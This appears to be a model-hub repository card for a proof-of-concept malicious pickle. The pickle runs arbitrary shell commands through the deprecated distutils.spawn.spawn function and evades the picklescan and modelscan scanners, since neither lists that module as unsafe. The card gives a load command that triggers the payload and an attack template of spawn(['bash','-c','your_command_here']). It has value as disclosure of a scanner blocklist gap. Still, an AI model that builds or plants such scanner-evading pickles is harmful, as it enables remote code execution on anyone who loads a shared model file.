Pickle Scanner Bypass β distutils.spawn.spawn
RCE via deprecated stdlib distutils.spawn.spawn()
Bypasses both picklescan v1.0.4 and modelscan v0.8.8.
The deprecated distutils.spawn.spawn() function internally calls subprocess.Popen(cmd).wait(), executing arbitrary commands. Neither scanner includes distutils.spawn in their unsafe modules list.
Usage
python3 -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"
# /tmp/MFV_PWNED will be created
Technical Details
- Module:
distutils.spawn(stdlib, deprecated since Python 3.10, removed in 3.12) - Function:
distutils.spawn.spawn() - Attack:
distutils.spawn.spawn(['bash', '-c', 'your_command_here']) - Detection: picklescan v1.0.4: β | modelscan v0.8.8: β
distutils.spawn is distinct from distutils.file_util (which is in picklescan's blocklist).
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support